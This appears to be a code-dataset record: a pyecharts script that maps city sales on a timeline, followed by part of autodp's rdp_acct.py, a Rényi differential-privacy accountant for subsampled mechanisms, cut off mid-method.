                         subtitle_text_size = 23 , subtitle_color="white", \
                         title_color="red", title_pos="center", width=1200, height=600, \
                         background_color='#404a59'))
        # type="effectScatter" with is_random=True / effect_scale makes the
        # points pulse outward for emphasis. geo_cities_coords supplies
        # coordinates for cities missing from pyecharts' built-in gazetteer.
        geos[index].add("title level1", cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\
                        visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \
                        is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \
                        geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \
                        '济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , '文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \
                        '宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \
                        pieces=[
                            {"min":0.1, "max": 50 , "label": "0-50"},
                            {"min": 51, "max": 100 , "label": "51-100"},
                            {"min": 101, "max": 200 , "label": "101-200"},
                            {"min":201, "max": 500, "label": "201-500"},
                            {"min":500, "max": 2900, "label": ">500"}, ] )
        geos[index].show_config()
        geos[index].render("xxxx售出数量.html")
        # Add this year's frame to the timeline.
        timeline.add(geos[index],years[index] )
    timeline.render('final_graph.html')
def main():
    """Entry point: load the sales table and render the timeline map."""
    df = get_data_signalmachine()
    # print(df)
    plot_map(df)
if __name__ == "__main__":
    main()
| 47.54321
| 317
| 0.579849
|
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import math
import pymssql
import numpy as np
import copy
import re
from sklearn import preprocessing
from sklearn.linear_model import LinearRegression
from pyecharts import Map, Geo , Timeline
def get_data_signalmachine():
df = pd.read_excel('Data.xlsx' , sheet_name='example')
df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True)
df.rename(columns = {'行标签':'city'} , inplace = True)
df.set_index('city' , inplace = True)
df = df.T
df.rename(columns = {'合计' : 'total'} , inplace = True)
return df
def plot_map(df):
years = list(df.index)
geos = []
timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \
is_timeline_show = False )
for index in range(len(years)):
cities = list(df.columns)
cities.remove('total')
values = list(df.loc[years[index] , :])
total_num = values[-1]
del(values[-1])
geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \
subtitle_text_size = 23 , subtitle_color="white", \
title_color="red", title_pos="center", width=1200, height=600, \
background_color='#404a59'))
geos[index].add("title level1", cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\
visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \
is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \
geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \
'济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , '文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \
'宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \
pieces=[
{"min":0.1, "max": 50 , "label": "0-50"},
{"min": 51, "max": 100 , "label": "51-100"},
{"min": 101, "max": 200 , "label": "101-200"},
{"min":201, "max": 500, "label": "201-500"},
{"min":500, "max": 2900, "label": ">500"}, ] )
geos[index].show_config()
geos[index].render("xxxx售出数量.html")
timeline.add(geos[index],years[index] )
timeline.render('final_graph.html')
def main():
df = get_data_signalmachine()
plot_map(df)
if __name__ == "__main__":
main()
| true
| true
|
f705bf3cfd5f5c6cac8ba32067f41aadcc0e38d6
| 34,521
|
py
|
Python
|
autodp/rdp_acct.py
|
jeremy43/autodp-1
|
0a3626f6e1baaefb46715396998d1e8029a659bb
|
[
"Apache-2.0"
] | 2
|
2020-06-11T02:48:41.000Z
|
2020-11-17T07:04:01.000Z
|
autodp/rdp_acct.py
|
jeremy43/autodp-1
|
0a3626f6e1baaefb46715396998d1e8029a659bb
|
[
"Apache-2.0"
] | null | null | null |
autodp/rdp_acct.py
|
jeremy43/autodp-1
|
0a3626f6e1baaefb46715396998d1e8029a659bb
|
[
"Apache-2.0"
] | null | null | null |
"""
This file contains the implementation of the main class object: anaRDPacct --- an analytical moment accountant
that keeps track the effects of a hetereogeneous sequence of randomized algorithms using the RDP technique.
In particular it supports amplification of RDP by subsampling without replacement and the amplification of RDP
by poisson sampling, but unfortunately not (yet) together.
"""
import numpy as np
from scipy.optimize import minimize_scalar
import sys
sys.path.append('..')
import autodp
from autodp import utils, rdp_bank
from autodp.privacy_calibrator import subsample_epsdelta
import scipy
import math
def general_upperbound(func, mm, prob):
    """
    :param func: RDP of the base mechanism, as a function of alpha
    :param mm: alpha in RDP
    :param prob: sample probability
    :return: the upperbound in theorem 1 in 2019 ICML,could be applied for general case(including poisson distribution)
    k_approx = 100 k approximation is applied here
    """

    def cgf(x):
        # CGF of the base mechanism: (alpha - 1) * eps(alpha).
        return (x - 1) * func(x)

    if np.isinf(func(mm)):
        return np.inf
    if mm == 1 or mm == 0:
        return 0

    cur_k = np.minimum(50, mm - 1)  # choose small k-approx for general upperbound (here is 50) in case of scipy-accuracy
    # All terms below are kept in log space for numerical stability.
    log_term_1 = mm * np.log(1 - prob)
    #logBin = utils.get_binom_coeffs(mm)
    log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm))
    neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
                  utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in
                  range(3, cur_k + 1)]
    neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log(
        1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1]
    neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob)
    neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm)
    pos_term = utils.stable_logsumexp([log_term_1, log_term_2])
    neg_term_3.append(neg_term_4)
    neg_term_3.append(neg_term_5)
    neg_term_3.append(neg_term_6)
    neg_term = utils.stable_logsumexp(neg_term_3)
    # Bound = log( exp(pos_term) - exp(neg_term) ), still in log space.
    bound = utils.stable_log_diff_exp(pos_term, neg_term)[1]
    return bound
def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local):
    # evaulate the fast CGF bound for the subsampled mechanism
    # func evaluates the RDP of the base mechanism
    # mm is alpha.  NOT lambda.
    # NOTE(review): this unconditional return disables the entire bound below —
    # everything after this line is dead code. Presumably a temporary
    # debugging/ablation switch; confirm whether it should be removed so the
    # fast bound is actually computed.
    return np.inf
    if np.isinf(func(mm)):
        return np.inf
    if mm == 1:
        return 0
    # The O(1) term covering l = 2 (three alternative bounds, take the min).
    secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1)
                                       + np.minimum(func(2), np.log(4)),
                                       np.log(2) + func(2)),
                            np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1]
                            + 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1]
                            ) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2)

    if mm == 2:
        return utils.stable_logsumexp([0, secondterm])

    # approximate the remaining terms using a geometric series
    logratio1 = np.log(prob) + np.log(mm) + func(mm)
    logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1)
    logratio = np.minimum(logratio1, logratio2)
    if logratio1 > logratio2:
        coeff = 1
    else:
        coeff = 2

    if mm == 3:
        return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio])

    # Calculate the sum of the geometric series starting from the third term. This is a total of mm-2 terms.
    if logratio < 0:
        geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \
                                 + np.log(1 - np.exp((mm - 2) * logratio))
    elif logratio > 0:
        geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1)
    else:
        geometric_series_bound = np.log(coeff) + np.log(mm - 2)

    # we will approximate using (1+h)^mm
    logh1 = np.log(prob) + func(mm - 1)
    logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1)
    binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1)
    binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2)
    # Subtract the l = 0, 1, 2 terms that are already accounted for exactly.
    tmpsign, binomial_series_bound1 \
        = utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2)
                                  + utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm)
                                                            + np.log(mm - 1) - np.log(2)]))
    tmpsign, binomial_series_bound2 \
        = utils.stable_sum_signed(True, binomial_series_bound2, False,
                                  utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm)
                                                          + np.log(mm - 1) - np.log(2)]))
    remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2])
    return utils.stable_logsumexp([0, secondterm, remainder])
def fast_poission_subsampled_cgf_upperbound(func, mm, prob):
    # evaulate the fast CGF bound for the subsampled mechanism
    # func evaluates the RDP of the base mechanism
    # mm is alpha.  NOT lambda.
    # Returns min(bound1, bound2), both computed in log space.
    if np.isinf(func(mm)):
        return np.inf
    if mm == 1:
        return 0
    # Bound #1:   log [ (1-\gamma + \gamma e^{func(mm)})^mm ]
    bound1 = mm * utils.stable_logsumexp_two(np.log(1-prob), np.log(prob) + func(mm))
    # Bound #2:   log [ (1-gamma)^alpha E [ 1 + gamma/(1-gamma) E[p/q]]^mm ]
    # log[ (1-gamma)^\alpha { 1 + alpha gamma / (1-gamma) + gamma^2 /(1-gamma)^2 * alpha(alpha-1) /2 e^eps(2))
    #  + alpha \choose 3 * gamma^3 / (1-gamma)^3  / e^(-2 eps(alpha)) * (1 + gamma /(1-gamma) e^{eps(alpha)}) ^ (alpha - 3) }
    # ]
    if mm >= 3:
        bound2 = utils.stable_logsumexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob),
                                         (mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2),
                                         np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob)
                                         + (mm-3)*np.log(1-prob) + 2 * func(mm) +
                                         (mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))])
    else:
        # The 4-term expansion needs alpha >= 3; fall back to bound1.
        bound2 = bound1
    #print('www={} func={} mm={}'.format(np.exp(func(mm))-1),func, mm)
    #print('bound1 ={} bound2 ={}'.format(bound1,bound2))
    return np.minimum(bound1,bound2)
def fast_k_subsample_upperbound(func, mm, prob, k):
    """
    :param func: RDP of the base mechanism, as a function of alpha
    :param mm: alpha in RDP
    :param prob: sample probability
    :param k: approximate term
    :return: k-term approximate upper bound in therorem 11 in ICML-19
    """

    def cgf(x):
        # CGF of the base mechanism: (alpha - 1) * eps(alpha).
        return (x - 1) * func(x)

    if np.isinf(func(mm)):
        return np.inf
    if mm == 1:
        return 0
    #logBin = utils.get_binom_coeffs(mm)
    cur_k = np.minimum(k, mm - 1)
    # When 2k >= alpha the full binomial sum is affordable: evaluate exactly.
    if (2 * cur_k) >= mm:
        exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1)
        exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in
                        range(2, mm + 1)]
        exact_term_2.append(exact_term_1)
        bound = utils.stable_logsumexp(exact_term_2)
        return bound

    # Otherwise keep only the first/last cur_k binomial terms and bound the
    # middle; everything stays in log space.
    s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k))
    new_log_term_1 = np.log(1 - prob) * mm + mag1
    new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob),
                                                                         np.log(prob) + func(mm - cur_k))
    new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
                      utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in
                      range(2, cur_k + 1)]
    if len(new_log_term_3) > 0:
        new_log_term_3 = utils.stable_logsumexp(new_log_term_3)
    else:
        return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2)
    new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
                      utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in
                      range(mm - cur_k + 1, mm + 1)]
    new_log_term_4.append(new_log_term_1)
    new_log_term_4.append(new_log_term_2)
    new_log_term_4 = utils.stable_logsumexp(new_log_term_4)
    s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3)
    new_bound = new_log_term_5
    return new_bound
class anaRDPacct:
"""A class that keeps track of the analytical expression of the RDP --- 1/(alpha-1)*CGF of the privacy loss R.V."""
    def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False):
        """Set up an empty accountant.

        m: number of integer orders to precompute; m_max / m_lin_max cap the
        quadratic / linear growth of that grid; approx enables the general
        (approximate) subsampling bound.
        """
        # m_max indicates the number that we calculate binomial coefficients exactly up to.
        # beyond that we use Stirling approximation.

        # ------ Class Attributes -----------
        self.m = m  # default number of binomial coefficients to precompute
        self.m_max = m_max  # An upper bound of the quadratic dependence
        self.m_lin_max = m_lin_max  # An upper bound of the linear dependence.
        self.verbose = verbose
        self.approx = approx
        self.lambs = np.linspace(1, self.m, self.m).astype(int)  # Corresponds to \alpha = 2,3,4,5,.... for RDP
        self.alphas = np.linspace(1, self.m, self.m).astype(int)
        self.RDPs_int = np.zeros_like(self.alphas, float)  # composed RDP on the integer grid
        self.n=0  # number of distinct mechanisms registered so far
        self.RDPs = []  # analytical CGFs
        self.coeffs = []  # composition multiplicity per registered mechanism
        self.RDP_inf = .0  # This is effectively for pure DP.
        self.logBinomC = utils.get_binom_coeffs(self.m + 1)  # The logBinomC is only needed for subsampling mechanisms.
        self.idxhash = {}  # save the index of previously used algorithms
        self.cache = {}  # dictionary to save results from previously seen algorithms
        self.deltas_cache = {}  # dictionary to save results of all discrete derivative path
        self.evalRDP = lambda x: 0
        self.flag = True  # a flag indicating whether evalCGF is out of date
        self.flag_subsample = False  # a flag to indicate whether we need to expand the logBinomC.
        self.tol = tol
# ---------- Methods ------------
def build_zeroth_oracle(self):
self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)])
    def plot_rdp(self):
        """Plot the composed analytical RDP curve on a log-log scale."""
        if not self.flag:
            self.build_zeroth_oracle()
            self.flag = True
        import matplotlib.pyplot as plt
        plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
        x = range(0,self.m,1)
        y = [self.evalRDP(item) for item in x]
        plt.loglog(x, y)
        plt.show()
    def plot_cgf_int(self):
        """Plot the precomputed integer-grid CGF values on linear axes."""
        import matplotlib.pyplot as plt
        plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
        plt.plot(self.alphas, self.RDPs_int)
        plt.xlabel(r'$\lambda$')
        plt.ylabel('CGF')
        plt.show()
    def plot_rdp_int(self):
        """Overlay the integer-grid RDP with the analytical RDP (log-log)."""
        import matplotlib.pyplot as plt
        plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
        plt.loglog(self.alphas, self.RDPs_int)
        if not self.flag:
            self.build_zeroth_oracle()
            self.flag = True
        x = range(1,self.m_lin_max,1)
        y = [self.evalRDP(item) for item in x]
        plt.loglog(x, y)
        plt.xlabel(r'$\alpha$')
        plt.ylabel(r'RDP $\epsilon$')
        plt.show()
    def get_rdp(self,alphas):
        """Evaluate the composed RDP at each order in *alphas*.

        alphas: a numpy array or a list of numbers, all >= 1.
        Returns a numpy array of the corresponding RDP values.
        """
        if not self.flag:
            self.build_zeroth_oracle()
            self.flag = True
        alphas = np.array(alphas)
        assert(np.all(alphas >= 1))
        rdp_list = []
        for alpha in alphas:
            rdp_list.append(self.evalRDP(alpha))
        return np.array(rdp_list)
def get_eps(self, delta): # minimize over \lambda
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
if delta<0 or delta > 1:
print("Error! delta is a probability and must be between 0 and 1")
if delta == 0:
return self.RDP_inf
else:
def fun(x): # the input the RDP's \alpha
if x <= 1:
return np.inf
else:
return np.log(1 / delta)/(x-1) + self.evalRDP(x)
def fun_int(i): # the input is RDP's \alpha in integer
if i <= 1 | i >= len(self.RDPs_int):
return np.inf
else:
return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1]
# When do we have computational constraints?
# Only when we have subsampled items.
# First check if the forward difference is positive at self.m, or if it is infinite
while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0):
# If so, double m, expand logBimomC until the forward difference is positive
if self.flag_subsample:
# The following line is m^2 time.
self.logBinomC = utils.get_binom_coeffs(self.m*2+1)
# Update deltas_caches
for key, val in self.deltas_cache.items():
if type(key) is tuple:
func_tmp = key[0]
else:
func_tmp = key
cgf = lambda x: x*func_tmp(x+1)
deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2)
self.deltas_cache[key] = [deltas, signs_deltas]
new_alphas = range(self.m + 1, self.m * 2 + 1, 1)
self.alphas = np.concatenate((self.alphas, np.array(new_alphas))) # array of integers
self.m = self.m * 2
mm = np.max(self.alphas)
rdp_int_new = np.zeros_like(self.alphas, float)
for key,val in self.cache.items():
idx = self.idxhash[key]
rdp = self.RDPs[idx]
newarray = np.zeros_like(self.alphas, float)
for j in range(2,mm+1,1):
newarray[j-1] = rdp(1.0*j)
newarray[0]=newarray[1]
coeff = self.coeffs[idx]
rdp_int_new += newarray * coeff
self.cache[key] = newarray
self.RDPs_int = rdp_int_new
# # update the integer CGF and the cache for each function
# rdp_int_new = np.zeros_like(self.RDPs_int)
# for key,val in self.cache.items():
# idx = self.idxhash[key]
# rdp = self.RDPs[idx]
# newarray = np.zeros_like(self.RDPs_int)
# for j in range(self.m):
# newarray[j] = rdp(1.0*(j+self.m+1))
#
# coeff = self.coeffs[idx]
# rdp_int_new += newarray * coeff
# self.cache[key] = np.concatenate((val, newarray))
#
# # update the corresponding quantities
# self.RDPs_int = np.concatenate((self.RDPs_int, rdp_int_new))
#self.m = self.m*2
bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1
if bestint == self.m-1:
if self.verbose:
print('Warning: Reach quadratic upper bound: m_max.')
# In this case, we matches the maximum qudaratic upper bound
# Fix it by calling O(1) upper bounds and do logarithmic search
cur = fun(bestint)
while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8:
bestint = bestint*2
cur = fun(bestint)
if bestint > self.m_lin_max and self.approx ==True:
print('Warning: Reach linear upper bound: m_lin_max.')
return cur
results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2],
options={'disp': False})
if results.success:
return results.fun
else:
return None
#return fun(bestint)
if bestint == 0:
if self.verbose:
print('Warning: Smallest alpha = 1.')
# find the best integer alpha.
bestalpha = self.alphas[bestint]
results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1],
options={'disp':False})
# the while loop above ensures that bestint+2 is at most m, and also bestint is at least 0.
if results.success:
return results.fun
else:
# There are cases when certain \delta is not feasible.
# For example, let p and q be uniform the privacy R.V. is either 0 or \infty and unless all \infty
# events are taken cared of by \delta, \epsilon cannot be < \infty
return -1
def compose_mechanism(self, func, coeff=1.0):
self.flag = False
if func in self.idxhash:
self.coeffs[self.idxhash[func]] += coeff
# also update the integer CGFs
self.RDPs_int += self.cache[func] * coeff
else:
# book keeping
self.idxhash[func] = self.n
self.n += 1
self.coeffs.append(coeff)
# update the analytical
self.RDPs.append(func)
# also update the integer results
if func in self.cache:
tmp = self.cache[func]
else:
tmp = np.zeros_like(self.RDPs_int, float)
for i in range(self.m):
tmp[i] = func(i+1)
self.cache[func] = tmp # save in cache
self.RDPs_int += tmp * coeff
self.RDP_inf += func(np.inf) * coeff
#795010
#imple 100
    def compose_subsampled_mechanism(self, func, prob, coeff=1.0):
        """Compose a mechanism amplified by subsampling WITHOUT replacement.

        :param func: RDP curve of the base mechanism, func(alpha) -> epsilon.
        :param prob: subsampling rate, in (0, 1].
        :param coeff: number of applications of the subsampled mechanism.
        """
        # Invalidate the lazily built evaluator, and remember that subsampling
        # is in use (get_eps must refresh forward-difference caches when it grows m).
        self.flag = False
        self.flag_subsample = True
        if (func, prob) in self.idxhash:
            idx = self.idxhash[(func, prob)]
            # Known (mechanism, rate) pair: bump its multiplicity only,
            self.coeffs[idx] += coeff
            # and fold the cached integer-order RDP grid in with that weight.
            self.RDPs_int += self.cache[(func, prob)] * coeff
        else:
            def cgf(x):
                # CGF of the base mechanism at lambda = x (i.e. alpha = x + 1).
                return x * func(x+1)
            # Forward differences of exp(cgf), computed in a numerically stable
            # way; output is in polar form (log-magnitude plus sign).
            deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m)
            self.deltas_cache[(func,prob)] = [deltas,signs_deltas]

            def subsample_func_int(x):
                # Evaluates the subsampled CGF at alpha = x (lambda = x - 1).
                deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)]
                if np.isinf(func(x)):
                    return np.inf
                mm = int(x)
                fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local)
                fastupperbound2 = general_upperbound(func, mm, prob)
                if self.approx ==True:
                    if fastupperbound2 <0:
                        print('general rdp is negative',x)
                    return fastupperbound2
                if mm <= self.alphas[-1]:
                    # Exact evaluation via the binomial expansion; requires the
                    # precomputed O(m^2) table of log binomial coefficients.
                    moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)),
                                                      np.log(2) + cgf(j-1)),
                                           np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1]
                                           + 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob)
                                +self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)]
                    return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments))
                elif mm <= self.m_lin_max:
                    # Same bound with Stirling-approximated binomials: O(m) work.
                    moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1)
                                                        + np.minimum(cgf(j - 1), np.log(4)), np.log(2)
                                                        + cgf(j - 1)) + j * np.log(prob) + utils.logcomb(mm, j)
                    moments = [moment_bound(j) for j in range(2,mm+1,1)]
                    return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments))
                else:
                    # Beyond the linear range, fall back to the O(1) upper bound.
                    return fastupperbound

            def subsample_func(x):
                # RDP of the subsampled mechanism at (possibly non-integer)
                # alpha = x, via linear interpolation of the integer CGF bound.
                epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
                if np.isinf(x):
                    return epsinf
                if prob == 1.0:
                    return func(x)
                if (x >= 1.0) and (x <= 2.0):
                    return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
                if np.equal(np.mod(x, 1), 0):
                    return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
                xc = math.ceil(x)
                xf = math.floor(x)
                return np.minimum(
                    epsinf,
                    ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
                )

            # Book-keeping: register the new (mechanism, rate) pair.
            self.idxhash[(func, prob)] = self.n
            self.n += 1
            self.coeffs.append(coeff)
            self.RDPs.append(subsample_func)
            # Precompute the integer-order RDP grid up to max(alphas) (cached per pair).
            if (func,prob) in self.cache:
                results = self.cache[(func,prob)]
            else:
                results = np.zeros_like(self.RDPs_int, float)
                mm = np.max(self.alphas)
                for alpha in range(2, mm+1):
                    results[alpha-1] = subsample_func(alpha)
                # Trivial upper bound of RDP at alpha = 1 (the KL privacy):
                # reuse the alpha = 2 value.
                results[0] = results[1]
            self.cache[(func,prob)] = results
            self.RDPs_int += results * coeff
            # Track the pure-DP (alpha = inf) limit via eps-delta amplification.
            eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
            self.RDP_inf += eps * coeff
    def compose_poisson_subsampled_mechanisms(self, func, prob, coeff=1.0):
        """Compose a mechanism amplified by Poisson subsampling (lower-bound flavor).

        Implements the lower bound for subsampled RDP; it is also the exact
        formula of Poisson-subsampled RDP for many mechanisms, including the
        Gaussian mechanism.  Mixing Poisson subsampling with the
        without-replacement variant is not supported at the moment.

        :param func: RDP curve of the base mechanism, func(alpha) -> epsilon.
        :param prob: Poisson sampling probability, in (0, 1].
        :param coeff: number of applications of the subsampled mechanism.
        """
        # TODO: modify the caching identifiers so that different types of
        # subsampling can be distinguished.
        self.flag = False
        self.flag_subsample = True
        if (func, prob) in self.idxhash:
            idx = self.idxhash[(func, prob)]
            # Known pair: bump multiplicity and the integer-order RDP grid.
            self.coeffs[idx] += coeff
            self.RDPs_int += self.cache[(func, prob)] * coeff
        else:
            def cgf(x):
                # CGF of the base mechanism at lambda = x (alpha = x + 1).
                return x * func(x+1)

            def subsample_func_int(x):
                # CGF of the Poisson-subsampled mechanism at alpha = x.
                if np.isinf(func(x)):
                    return np.inf
                mm = int(x)
                fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
                k = self.alphas[-1]
                fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k)
                if self.approx == True:
                    return fastbound_k
                # NOTE(review): compares x (possibly float) rather than mm with
                # alphas[-1]; callers below pass integer alpha, where they agree.
                if x <= self.alphas[-1]:
                    # Exact expansion using the precomputed binomial table.
                    moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
                               + self.logBinomC[mm, j] for j in range(2,mm+1,1)]
                    return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
                elif mm <= self.m_lin_max:
                    # Stirling-approximated binomial coefficients: O(m) work.
                    moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
                               + utils.logcomb(mm,j) for j in range(2,mm+1,1)]
                    return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments)
                else:
                    # Beyond the linear range, fall back to the O(1) bound.
                    return fastbound

            def subsample_func(x):
                # RDP at (possibly non-integer) alpha = x via linear interpolation
                # of the integer-order CGF upper bound.
                if np.isinf(func(x)):
                    return np.inf
                if prob == 1.0:
                    return func(x)
                epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
                if np.isinf(x):
                    return epsinf
                if (x >= 1.0) and (x <= 2.0):
                    return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
                if np.equal(np.mod(x, 1), 0):
                    return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
                xc = math.ceil(x)
                xf = math.floor(x)
                return np.minimum(
                    epsinf,
                    ((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
                )

            # Book-keeping: register the new (mechanism, rate) pair.
            self.idxhash[(func, prob)] = self.n
            self.n += 1
            self.coeffs.append(coeff)
            self.RDPs.append(subsample_func)
            # Precompute the integer-order grid with a vectorized computation.
            # TODO: precomputing subsampled RDP for integers implements the same
            # thing twice and its benefit is unclear; consider simply calling
            # the lambda function instead.
            if (func,prob) in self.cache:
                results = self.cache[(func,prob)]
            else:
                results = np.zeros_like(self.RDPs_int, float)
                mm = np.max(self.alphas)
                jvec = np.arange(2, mm + 1)
                # logterm3plus[j-2] holds the j-th series term for j = 2..mm.
                logterm3plus = np.zeros_like(results)
                for j in jvec:
                    logterm3plus[j-2] = cgf(j-1) + j * np.log(prob)
                for alpha in range(2, mm+1):
                    if np.isinf(logterm3plus[alpha-1]):
                        results[alpha-1] = np.inf
                    else:
                        tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)]
                                                     + (alpha+1-jvec[0:alpha-1])*np.log(1-prob))
                        results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob)
                                                                      + np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1)
                # Trivial upper bound of RDP at alpha = 1 (the KL privacy).
                results[0] = results[1]
            self.cache[(func,prob)] = results
            self.RDPs_int += results * coeff
            # Track the pure-DP (alpha = inf) limit.
            eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
            self.RDP_inf += eps * coeff
    def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0):
        """Compose a mechanism amplified by Poisson subsampling (general bound).

        Implements the general amplification bounds for Poisson sampling; no
        additional assumptions on the base mechanism are needed.  Mixing Poisson
        subsampling with the without-replacement variant is not supported.

